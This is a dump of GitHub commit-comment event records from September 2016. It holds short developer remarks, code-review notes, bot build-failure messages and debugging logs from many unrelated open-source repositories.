{"id":"4639348687","type":"CommitCommentEvent","actor":{"login":"vramana"},"repo":{"name":"fcc-hyd/projects"},"payload":{"comment":{"id":19229477,"position":null,"line":null,"path":null,"commit_id":"fbb0b044730c2118cff5f6d1ef742537adf2769a","created_at":"2016-09-29T19:15:30Z","updated_at":"2016-09-29T19:15:30Z","body":"@SakkariNaresh Hey ping us on https://gitter.im/fcc-hyd/general It's kind of hard to explain everything here. "}},"created_at":"2016-09-29T19:15:30Z"}
{"id":"4639351338","type":"CommitCommentEvent","actor":{"login":"john-kurkowski"},"repo":{"name":"san650/ember-cli-page-object"},"payload":{"comment":{"id":19229485,"position":null,"line":null,"path":null,"commit_id":"c521335ffba9955a6acaf1006ed503cbb61ba72d","created_at":"2016-09-29T19:16:00Z","updated_at":"2016-09-29T19:16:00Z","body":"CHANGELOG.md?"}},"created_at":"2016-09-29T19:16:00Z"}
{"id":"4639356456","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19229495,"position":null,"line":null,"path":null,"commit_id":"5fc3e8a395b7f40834e40b248d91215f02ced4c6","created_at":"2016-09-29T19:16:55Z","updated_at":"2016-09-29T19:16:55Z","body":"Also see [Issue 311: Coverity finding CID 171230: Macro compares unsigned to 0 (NO_EFFECT)](https://github.com/weidai11/cryptopp/issues/311)."}},"created_at":"2016-09-29T19:16:55Z"}
{"id":"4639357297","type":"CommitCommentEvent","actor":{"login":"danlamanna"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19229496,"position":251,"line":271,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T19:17:06Z","updated_at":"2016-09-29T19:17:06Z","body":"Below can be `for plugin in os.listdir(pluginDir)` and `dirs` can be removed."}},"created_at":"2016-09-29T19:17:06Z"}
{"id":"4639357947","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19229498,"position":null,"line":null,"path":null,"commit_id":"7c69c910891516566da80e9048bbeff824fd3ef2","created_at":"2016-09-29T19:17:12Z","updated_at":"2016-09-29T19:17:12Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T19:17:12Z"}
{"id":"4639358644","type":"CommitCommentEvent","actor":{"login":"smeroni68"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19229500,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T19:17:20Z","updated_at":"2016-09-29T19:17:20Z","body":"I'll ask to vzw testers to do another try..."}},"created_at":"2016-09-29T19:17:20Z"}
{"id":"4639359210","type":"CommitCommentEvent","actor":{"login":"cmoneysmooth"},"repo":{"name":"CHSCS/Unit-0-DanMElin"},"payload":{"comment":{"id":19229505,"position":null,"line":null,"path":null,"commit_id":"4258c8e35eba05e10221560a25fbc54c099943d9","created_at":"2016-09-29T19:17:26Z","updated_at":"2016-09-29T19:17:26Z","body":"NEYHOYMENOY"}},"created_at":"2016-09-29T19:17:26Z"}
{"id":"4639361364","type":"CommitCommentEvent","actor":{"login":"earthgecko"},"repo":{"name":"hudsonfoo/kerbal-openmct"},"payload":{"comment":{"id":19229511,"position":167,"line":167,"path":"README.md","commit_id":"f9f90725c7feca62426da6ed64688b1fe9025d75","created_at":"2016-09-29T19:17:50Z","updated_at":"2016-09-29T19:17:50Z","body":"We do live in a crazy time :)  Awesome btw the way.  I do not have ksp but I had had a look at openmct and I can see the match :)  I fact I was thinking of trying ksp as I am not a gamer but..... I bought Universe Sandbox 2 last Saturday and .... omg.  My good friend @matzhouse said to me ksp, I looked.  Watching pydns and thinking Rosetta \"controlled crash\" tomorrow and looked Kerbal again after have a look at universetoday.com -> ksp -> oh hmmm mods -> science .. did not see openmct -> Google -> github -> here.\r\n\r\nAnd yes crazy times :)\r\n\r\nAwesome idea, look forward to maybe have a play if... I ever wonder down the ksp road, not sure I should :)\r\n\r\nHowever there is a question :)  I think openmct could be pointed at any type of metrics, however I  have not dug that deep and it may not make sense to me unless I spent a lot of time reversing engineering code to glean some understanding.  Which takes ... well +months?  You on the hand seem to have a handle on what it could be ported to :)\r\n\r\nIt could make a mission control dashboard for any timeseries based telemetry could it not?  ksp, formula1, machine metrics and collective application metrics I am guessing.  Have no idea how but when @matzhose should me Curiosity demo.... well mindblown and oh the possibilities :)\r\n\r\nI am glad you had time to do this, sounds like time is a limited resource for you, seems so many of us are in the same boat :)\r\n\r\nStill smiling :)  @hudsonfoo good on ya!"}},"created_at":"2016-09-29T19:17:50Z"}
{"id":"4639373495","type":"CommitCommentEvent","actor":{"login":"zachmullen"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19229542,"position":251,"line":271,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T19:20:03Z","updated_at":"2016-09-29T19:20:03Z","body":"Ah, Gotcha."}},"created_at":"2016-09-29T19:20:03Z"}
{"id":"4639374970","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19229547,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T19:20:20Z","updated_at":"2016-09-29T19:20:20Z","body":"Right, your proposal is much more elegant. I dont think though that it matters for speed since it is done only on pawn probes and not in every eval."}},"created_at":"2016-09-29T19:20:20Z"}
{"id":"4639382186","type":"CommitCommentEvent","actor":{"login":"bigKS"},"repo":{"name":"sandvine-eng/svauto"},"payload":{"comment":{"id":19229571,"position":null,"line":null,"path":null,"commit_id":"89bdddd6ef92423594c66b8a9dc8bfb2fb9a6085","created_at":"2016-09-29T19:21:42Z","updated_at":"2016-09-29T19:21:42Z","body":"Good job.\r\nBut you have to make sure you use the old rc.conf.j2 if you want to launch an older version PTS!"}},"created_at":"2016-09-29T19:21:42Z"}
{"id":"4639382713","type":"CommitCommentEvent","actor":{"login":"earthgecko"},"repo":{"name":"hudsonfoo/kerbal-openmct"},"payload":{"comment":{"id":19229572,"position":167,"line":167,"path":"README.md","commit_id":"f9f90725c7feca62426da6ed64688b1fe9025d75","created_at":"2016-09-29T19:21:47Z","updated_at":"2016-09-29T19:21:47Z","body":"I nearly passed out with joy (also _I had been drinking_) when I read this your README.rd :)   further HUGE thank you goes out to @hudsonfoo for being honest :)  Yes we do live in crazy times and sometimes a little drinking keeps us honest :)"}},"created_at":"2016-09-29T19:21:47Z"}
{"id":"4639382934","type":"CommitCommentEvent","actor":{"login":"g0wfv"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":19229573,"position":null,"line":null,"path":null,"commit_id":"21a786329e19a400f55c95120b5d3d787ac061c2","created_at":"2016-09-29T19:21:49Z","updated_at":"2016-09-29T19:21:49Z","body":"Reverting the timer has re-introduced the erroneous insertion of silence packets, at least when using the HD44780 LCD - I suspect the delay writing to the LCD is enough to trigger the insertion.  Now we understand the implications, perhaps placing it just after them_display-> writeDStar call is the way to go with this one ...\r\n\r\n```\r\nM: 2016-09-29 19:16:33.705 D-Star, received network end of transmission, 7.1 seconds, 0% packet loss, BER: 0.0%\r\nM: 2016-09-29 19:16:34.821 D-Star, received network header from SQ7OTH  /5100 to CQCQCQ   via REF001 C\r\n**D: 2016-09-29 19:16:34.829 D-Star, lost audio for 300ms filling in, elapsed: 457ms, expected: 22, received: 0**\r\nD: 2016-09-29 19:16:34.832 D-Star, audio sequence no. 0, errs: 0/48\r\n```\r\n"}},"created_at":"2016-09-29T19:21:49Z"}
{"id":"4639383258","type":"CommitCommentEvent","actor":{"login":"Jeyanthpranav"},"repo":{"name":"Jeyanthpranav/ProgrammingAssignment2"},"payload":{"comment":{"id":19229574,"position":22,"line":24,"path":"cachematrix.R","commit_id":"d6a57f1e625fca22725954b92886916ffce80ad7","created_at":"2016-09-29T19:21:52Z","updated_at":"2016-09-29T19:21:52Z","body":"## This function computes the inverse of the special \"matrix\" created by makeCacheMatrix \r\n## If the inverse has already been calculated then it should retrieve the inverse from the cache.\r\n"}},"created_at":"2016-09-29T19:21:52Z"}
{"id":"4639384722","type":"CommitCommentEvent","actor":{"login":"Jeyanthpranav"},"repo":{"name":"Jeyanthpranav/ProgrammingAssignment2"},"payload":{"comment":{"id":19229580,"position":23,"line":25,"path":"cachematrix.R","commit_id":"d6a57f1e625fca22725954b92886916ffce80ad7","created_at":"2016-09-29T19:22:08Z","updated_at":"2016-09-29T19:22:08Z","body":"## This function computes the inverse of the special \"matrix\" created by makeCacheMatrix \r\n## If the inverse has already been calculated then it should retrieve the inverse from the cache.\r\n"}},"created_at":"2016-09-29T19:22:08Z"}
{"id":"4639387210","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229586,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:22:34Z","updated_at":"2016-09-29T19:22:34Z","body":"error"}},"created_at":"2016-09-29T19:22:34Z"}
{"id":"4639387378","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19229587,"position":null,"line":null,"path":null,"commit_id":"7c69c910891516566da80e9048bbeff824fd3ef2","created_at":"2016-09-29T19:22:36Z","updated_at":"2016-09-29T19:22:36Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c69c910891516566da80e9048bbeff824fd3ef2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-29T19:22:36Z"}
{"id":"4639387837","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229588,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:22:42Z","updated_at":"2016-09-29T19:22:42Z","body":"error"}},"created_at":"2016-09-29T19:22:42Z"}
{"id":"4639388246","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229589,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:22:46Z","updated_at":"2016-09-29T19:22:46Z","body":"error\r\n"}},"created_at":"2016-09-29T19:22:46Z"}
{"id":"4639388552","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229591,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:22:50Z","updated_at":"2016-09-29T19:22:50Z","body":"error"}},"created_at":"2016-09-29T19:22:50Z"}
{"id":"4639389110","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229594,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:22:57Z","updated_at":"2016-09-29T19:22:57Z","body":"error\r\n"}},"created_at":"2016-09-29T19:22:57Z"}
{"id":"4639392634","type":"CommitCommentEvent","actor":{"login":"g0wfv"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":19229599,"position":null,"line":null,"path":null,"commit_id":"21a786329e19a400f55c95120b5d3d787ac061c2","created_at":"2016-09-29T19:23:37Z","updated_at":"2016-09-29T19:23:37Z","body":"Side note - me thinks the HD44780 is a rather antiquated device!"}},"created_at":"2016-09-29T19:23:37Z"}
{"id":"4639394017","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229603,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:23:51Z","updated_at":"2016-09-29T19:23:51Z","body":"eeror"}},"created_at":"2016-09-29T19:23:51Z"}
{"id":"4639394198","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229604,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:23:53Z","updated_at":"2016-09-29T19:23:53Z","body":"eeror"}},"created_at":"2016-09-29T19:23:53Z"}
{"id":"4639394315","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229605,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:23:55Z","updated_at":"2016-09-29T19:23:55Z","body":"eeror"}},"created_at":"2016-09-29T19:23:55Z"}
{"id":"4639394420","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229607,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:23:57Z","updated_at":"2016-09-29T19:23:57Z","body":"eeror"}},"created_at":"2016-09-29T19:23:57Z"}
{"id":"4639395054","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229608,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:24:04Z","updated_at":"2016-09-29T19:24:04Z","body":"eeror"}},"created_at":"2016-09-29T19:24:04Z"}
{"id":"4639395164","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229609,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:24:05Z","updated_at":"2016-09-29T19:24:05Z","body":"eeror"}},"created_at":"2016-09-29T19:24:05Z"}
{"id":"4639395218","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19229610,"position":null,"line":null,"path":null,"commit_id":"148fcbc57e5747a665fb4ee78d9a8270e28d08cd","created_at":"2016-09-29T19:24:06Z","updated_at":"2016-09-29T19:24:06Z","body":"i don't quite grasp the idea of pupmode 3. in frugal mode = initrd.gz: all sfs's (puppy,fdrv,zdrv,adrv,ydrv) are copied to ram, unless there is not enough ram. you can always force it via a boot param.\r\n\r\ni recently fixed full installs with the current code.. i see full installs are basically to get a performance boost in ram/speed challenged machines.. to avoid aufs, sfs compression and ram usage.\r\n\r\nso a full install does not have aufs, everything is put together by the installer script so it can run... so i wonder if you can explain the idea of a full install somehow handled in the initrd init..."}},"created_at":"2016-09-29T19:24:06Z"}
{"id":"4639395464","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229613,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:24:09Z","updated_at":"2016-09-29T19:24:09Z","body":"eeror"}},"created_at":"2016-09-29T19:24:09Z"}
{"id":"4639395631","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229615,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:24:11Z","updated_at":"2016-09-29T19:24:11Z","body":"eeror"}},"created_at":"2016-09-29T19:24:11Z"}
{"id":"4639395796","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229616,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:24:13Z","updated_at":"2016-09-29T19:24:13Z","body":"eeror"}},"created_at":"2016-09-29T19:24:13Z"}
{"id":"4639396007","type":"CommitCommentEvent","actor":{"login":"RaphaelfsOliveira"},"repo":{"name":"RaphaelfsOliveira/pfv-responsivo"},"payload":{"comment":{"id":19229617,"position":null,"line":null,"path":null,"commit_id":"754b1558f0194ad59f8ddfebdd11d44d34cb087b","created_at":"2016-09-29T19:24:15Z","updated_at":"2016-09-29T19:24:15Z","body":"eeror"}},"created_at":"2016-09-29T19:24:15Z"}
{"id":"4639396859","type":"CommitCommentEvent","actor":{"login":"funinthefalls"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19229621,"position":null,"line":null,"path":null,"commit_id":"28e35bcd683316fca3fc6e6e11d0d086d86cd99d","created_at":"2016-09-29T19:24:24Z","updated_at":"2016-09-29T19:24:24Z","body":"Speaking of docs, do you have any guidelines in place, or suggestions on them? I am itching to get writing again :)"}},"created_at":"2016-09-29T19:24:24Z"}
{"id":"4639405121","type":"CommitCommentEvent","actor":{"login":"garrettwinder"},"repo":{"name":"simplygoodwork/donkeytail-plugin"},"payload":{"comment":{"id":19229642,"position":null,"line":null,"path":null,"commit_id":"d37f87d31e661abe388c31753a345de074f863c3","created_at":"2016-09-29T19:25:56Z","updated_at":"2016-09-29T19:25:56Z","body":"@bootsified Haha, 👍 ."}},"created_at":"2016-09-29T19:25:56Z"}
{"id":"4639406762","type":"CommitCommentEvent","actor":{"login":"rldhont"},"repo":{"name":"3liz/lizmap-web-client"},"payload":{"comment":{"id":19229648,"position":null,"line":null,"path":null,"commit_id":"43928e32c482fae4d20a70e1f4325582868ca8b1","created_at":"2016-09-29T19:26:13Z","updated_at":"2016-09-29T19:26:13Z","body":"I didn't touch the print part and the issue you report has no link to the code.\r\nThe format is now get from a select element https://github.com/3liz/lizmap-web-client/commit/8a7567eefe5b48af33061f8af3f7cca3964d9b8e\r\nOpen an issue and get precision about the browser you use."}},"created_at":"2016-09-29T19:26:13Z"}
{"id":"4639409608","type":"CommitCommentEvent","actor":{"login":"cmsc495-fall2016"},"repo":{"name":"cmsc495-fall2016/cmsc495-fall2016.github.io"},"payload":{"comment":{"id":19229659,"position":null,"line":null,"path":null,"commit_id":"7fa821bec343dcc04b62a0e05b11e04c8126b794","created_at":"2016-09-29T19:26:46Z","updated_at":"2016-09-29T19:26:46Z","body":"Wow, I shouldn't write code when I'm half asleep, I'll clean this up after work"}},"created_at":"2016-09-29T19:26:46Z"}
{"id":"4639411317","type":"CommitCommentEvent","actor":{"login":"Vitaliy-1"},"repo":{"name":"asmecher/ojs"},"payload":{"comment":{"id":19229666,"position":null,"line":null,"path":null,"commit_id":"6d71e21dbd64c6d5db5cb382caa33d139b95bf3b","created_at":"2016-09-29T19:27:04Z","updated_at":"2016-09-29T19:27:04Z","body":"I think this change is unnecessary. After this edit I see that when using English (primary locale)  DC.Title metatag is on Ukrainian (secondary locale) and DC.Title.Alternative is on Ukranian also.  It is not logical as for me.  "}},"created_at":"2016-09-29T19:27:04Z"}
{"id":"4639412519","type":"CommitCommentEvent","actor":{"login":"PhineasFreak"},"repo":{"name":"PhineasFreak/RSSVE"},"payload":{"comment":{"id":19229670,"position":null,"line":null,"path":null,"commit_id":"bdbba905230259ba16a30e4e6655e45f9db1042d","created_at":"2016-09-29T19:27:18Z","updated_at":"2016-09-29T19:27:18Z","body":"Forgot to include it with the main Patch 24."}},"created_at":"2016-09-29T19:27:18Z"}
{"id":"4639413171","type":"CommitCommentEvent","actor":{"login":"eduardoedson"},"repo":{"name":"interlegis/sapl"},"payload":{"comment":{"id":19229672,"position":17,"line":20,"path":"sapl/base/urls.py","commit_id":"f7f93f8860efcccf4436c70036a0cab7ef4fa37f","created_at":"2016-09-29T19:27:25Z","updated_at":"2016-09-29T19:27:25Z","body":"Como ficou pratico D:"}},"created_at":"2016-09-29T19:27:25Z"}
{"id":"4639424234","type":"CommitCommentEvent","actor":{"login":"sevoku"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19229702,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-29T19:29:29Z","updated_at":"2016-09-29T19:29:29Z","body":"@HinTak I don't see a reasyon why we need a more generic implementation. We want to get the syle property named \"label-color\", make sure that we really get a color and use that instead of the default one. Its a clearly defined use case. WRT `!null` check, this is not necessary when we use `is` because ` null` is not `Gdk.Color` since `Gdk.Color` is a not nullable `ValueType`. This means that `colorVal is Gdk.Color` is only true if `StyleGetProperty` returned a `Gdk.Color` (or its derivate) and nothing else (and not `null`).\r\nMSDN quote:\r\n> An is expression evaluates to true if the provided expression is non-null, and the provided object can be cast to the provided type without causing an exception to be thrown.\r\n\r\nhttps://msdn.microsoft.com/en-us/library/scekt9xw.aspx\r\n\r\nSo maybe you can explain what exactly dosn't work for you (with an example if possible)? Don't you get the right color if you set `link-label` in your gtkrc? Or do you always get a different color and not the default one?"}},"created_at":"2016-09-29T19:29:29Z"}
{"id":"4639433944","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19229721,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T19:31:13Z","updated_at":"2016-09-29T19:31:13Z","body":"By the way, this discussion makes me realize that we already have some check for (some of the stonewalls) in the current master, line 165 of pawns.cpp:\r\n\r\n````\r\n        else if (!supported)\r\n            score -= Unsupported[more_than_one(neighbours & pawnAttacksBB[s])];\r\n````\r\n\r\nThis lines gives a S(4,4) *penalty* to stonewalls when the pawn at the bottom of the triangle is not supported.\r\n\r\nCould this lead to a unification with your idea?"}},"created_at":"2016-09-29T19:31:13Z"}
{"id":"4639435179","type":"CommitCommentEvent","actor":{"login":"godbeno"},"repo":{"name":"godbeno/godbillebenoit"},"payload":{"comment":{"id":19229723,"position":null,"line":null,"path":null,"commit_id":"49808fcfa6391d5f1a866910c8950a117e860235","created_at":"2016-09-29T19:31:27Z","updated_at":"2016-09-29T19:31:27Z","body":"Fusion"}},"created_at":"2016-09-29T19:31:27Z"}
{"id":"4639436482","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19229731,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-29T19:31:41Z","updated_at":"2016-09-29T19:31:41Z","body":"I tried yesterday's release on my I545. Still stops at Sammy Logo. No led action or anything. After 10 min I forced a reboot and flashed the latest MM."}},"created_at":"2016-09-29T19:31:41Z"}
{"id":"4639446449","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"oe-alliance/oe-alliance-settings"},"payload":{"comment":{"id":19229750,"position":null,"line":null,"path":null,"commit_id":"a6943ddfd7a2fc1f31bdce5c228d302936deeb27","created_at":"2016-09-29T19:33:37Z","updated_at":"2016-09-29T19:33:37Z","body":"Why not just install his isettings plugin? You can then install the channel list direct Vhannibal's server."}},"created_at":"2016-09-29T19:33:37Z"}
{"id":"4639449090","type":"CommitCommentEvent","actor":{"login":"MaSteve"},"repo":{"name":"MaSteve/UVA-problems"},"payload":{"comment":{"id":19229756,"position":null,"line":null,"path":null,"commit_id":"42c1b32ea7591974936cc52de0d346bedfd1bbc5","created_at":"2016-09-29T19:34:08Z","updated_at":"2016-09-29T19:34:08Z","body":"I'm not proud at all of this solution, but it was the first thing that came to my mind. @david-perez's solution should be better."}},"created_at":"2016-09-29T19:34:08Z"}
{"id":"4639452036","type":"CommitCommentEvent","actor":{"login":"achubaty"},"repo":{"name":"PredictiveEcology/SpaDES"},"payload":{"comment":{"id":19229766,"position":null,"line":null,"path":null,"commit_id":"9ebbcf3eada800d213ef1bd48e9ade09b167c930","created_at":"2016-09-29T19:34:41Z","updated_at":"2016-09-29T19:34:41Z","body":"this should work (for linux at least) per https://github.com/travis-ci/travis-ci/issues/6353"}},"created_at":"2016-09-29T19:34:41Z"}
{"id":"4639452977","type":"CommitCommentEvent","actor":{"login":"adriendherbigny"},"repo":{"name":"adriendherbigny/DayDiff"},"payload":{"comment":{"id":19229769,"position":null,"line":null,"path":null,"commit_id":"03235644b3ec2d7c360da844ea38d5df546a3b5f","created_at":"2016-09-29T19:34:52Z","updated_at":"2016-09-29T19:34:52Z","body":"![dsc00832](https://cloud.githubusercontent.com/assets/19931633/18969198/616b9bf6-868c-11e6-891c-b071d5f1090a.JPG)\r\n"}},"created_at":"2016-09-29T19:34:52Z"}
{"id":"4639460252","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19229785,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T19:36:18Z","updated_at":"2016-09-29T19:36:18Z","body":"Mmmhh.. indeed indeed. I will have some time tomorrow evening, could try it. But feel free to try it yourself, if you have time before that."}},"created_at":"2016-09-29T19:36:18Z"}
{"id":"4639477388","type":"CommitCommentEvent","actor":{"login":"mikem23"},"repo":{"name":"xning/koji"},"payload":{"comment":{"id":19229817,"position":13,"line":957,"path":"builder/kojid","commit_id":"0cfdb4f97980b53eda54a69062e3628e00120d41","created_at":"2016-09-29T19:39:36Z","updated_at":"2016-09-29T19:39:36Z","body":"Side note: avoid using filter when a list comprehension will work just as easily. LCs are generally more readable (and also faster). E.g.\r\n\r\n  if [a for a in archlist if a != 'noarch']:"}},"created_at":"2016-09-29T19:39:36Z"}
{"id":"4639479342","type":"CommitCommentEvent","actor":{"login":"dynamiccast"},"repo":{"name":"Nanocloud/nanocloud"},"payload":{"comment":{"id":19229820,"position":5,"line":120,"path":"assets/app/components/remote-session/component.js","commit_id":"1642b162195f7aa53d52f1d29585da1d19df02c7","created_at":"2016-09-29T19:40:00Z","updated_at":"2016-09-29T19:40:00Z","body":"`newString` we should think of a message more unique to Nanocloud VDI experience."}},"created_at":"2016-09-29T19:40:00Z"}
{"id":"4639484509","type":"CommitCommentEvent","actor":{"login":"davidker"},"repo":{"name":"davidker/unisys"},"payload":{"comment":{"id":19229825,"position":null,"line":null,"path":null,"commit_id":"8e96f804e1abeaea218797d787b294e4512b9fdb","created_at":"2016-09-29T19:41:00Z","updated_at":"2016-09-29T19:41:00Z","body":">  No need to initialize pmsg_hdr. In fact, it looks like you can delete it altogether, and just directly use\r\n>  bus_info->pending_msg_hdr when you do the kzalloc() and memcpy().\r\n> \r\nI had that and removed it, but I will put it back to that way.\r\n\r\n> Whenever you kfree(bus_info->pending_msg_hdr), you must also set it to NULL.\r\n> \r\nThanks, will fix. \r\n\r\n> No need to initialize err.\r\n> \r\nThanks, will fix.\r\n\r\n> Given that you changed the return value to int, I suspect you intended:\r\n> •  return 0  instead of just  return  \r\n> •  return err  at the very end of the function\r\n>\r\nThanks, I already have a patch to fix this, just forgot to push that one up. Should I change the error handling as a separate patch? Or should I combine the two?\r\n \r\n> I don't understand how you can now start using errno values (like -ENOMEM) in the controlvm responses, which is what you are doing by sending your  err  to bus_responder().\r\n>\r\nWe officially can't, but if you look at  (chipset_bus_create)[http://tcsxeon:8080/source/xref/Linux-upstream/drivers/staging/unisys/visorbus/visorbus_main.c#1067] it calls \"create_bus_instance\" which returns Linux error codes. It just sticks those values back into the response that it send back via bus_create_response. \r\n\r\n> I'm a little hazy on the code in bus_epilog() where it was prepared to handle the case where bus_info->pending_msg_hdr was already allocated. Perhaps that is bogus, but it doesn't appear as if your new code addresses that. (But, if it is bogus code in bus_epilog(), that of course is ok.)\r\n> \r\nIn bus_epilog it isn't sure who was calling it. In bus_create there is no bus_info until I'm done, I'm creating the bus so there is no pending_msg_hdr. In bus_destroy, yes, I will need to make sure there is no pending_msg_hdr for it. Though some of this is moot since it is single threaded messages for the same bus.\r\n"}},"created_at":"2016-09-29T19:41:00Z"}
{"id":"4639484545","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19229826,"position":null,"line":null,"path":null,"commit_id":"98edf3bdfefcd7fd40f981a3778db245cf113628","created_at":"2016-09-29T19:41:00Z","updated_at":"2016-09-29T19:41:00Z","body":":+1"}},"created_at":"2016-09-29T19:41:00Z"}
